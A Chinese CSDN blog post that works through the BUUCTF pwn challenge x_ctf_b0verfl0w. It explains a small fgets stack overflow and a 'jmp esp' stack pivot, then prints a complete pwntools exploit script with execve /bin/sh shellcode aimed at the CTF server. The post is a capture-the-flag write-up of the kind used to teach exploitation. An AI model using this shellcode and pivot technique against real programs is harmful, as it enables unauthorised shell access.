[BUUCTF]PWN——x_ctf_b0verfl0w(汇编代码写shellcode+jump esp指令劫持esp)

x_ctf_b0verfl0w

附件

步骤

  1. 例行检查,32位程序,开启了RELRO(不可改写got表)
    在这里插入图片描述

  2. 本地试运行一下程序,看看大概的情况
    在这里插入图片描述

  3. 32位ida载入
    在这里插入图片描述
    fgets可以溢出,但是只可以溢出0x32-0x20-0x4=14字节,由于没有开启nx,首先想到的是shellcode,0x20肯定放不进pwntools生成的shellcode,只能自己手写,但是得想办法劫持esp去执行我们的shellcode

  4. 在hit函数中找到了jump esp的gadget
    在这里插入图片描述
    因此我们可以构造这样的栈
    在这里插入图片描述
    ret上写的是jump esp,执行完ret之后会esp+4,指向了sub esp,0x28;jump esp,然后执行,esp又回到了shellcode的位置,然后jump esp;就执行了shellcode。
    关于执行完ret之后esp和eip的变化详细看这篇文章

  5. 如何手写shellcode参照我之前的文章,我这边就直接贴exp了

from pwn import *
context.log_level='debug'
r=remote('node3.buuoj.cn',29554)

shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
print len(shellcode)  #21

jmp_esp=0x8048504
sub_esp_jmp=asm('sub esp,0x28;jmp esp')

payload=shellcode+(0x20-len(shellcode)+4)*'a'+p32(jmp_esp)+sub_esp_jmp

r.sendline(payload)

r.interactive()

在这里插入图片描述

参与评论 您还未登录,请先 登录 后发表或查看评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
©️2022 CSDN 皮肤主题:像素格子 设计师:blogdevteam 返回首页

打赏作者

Angel~Yan

你的鼓励将是我创作的最大动力

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值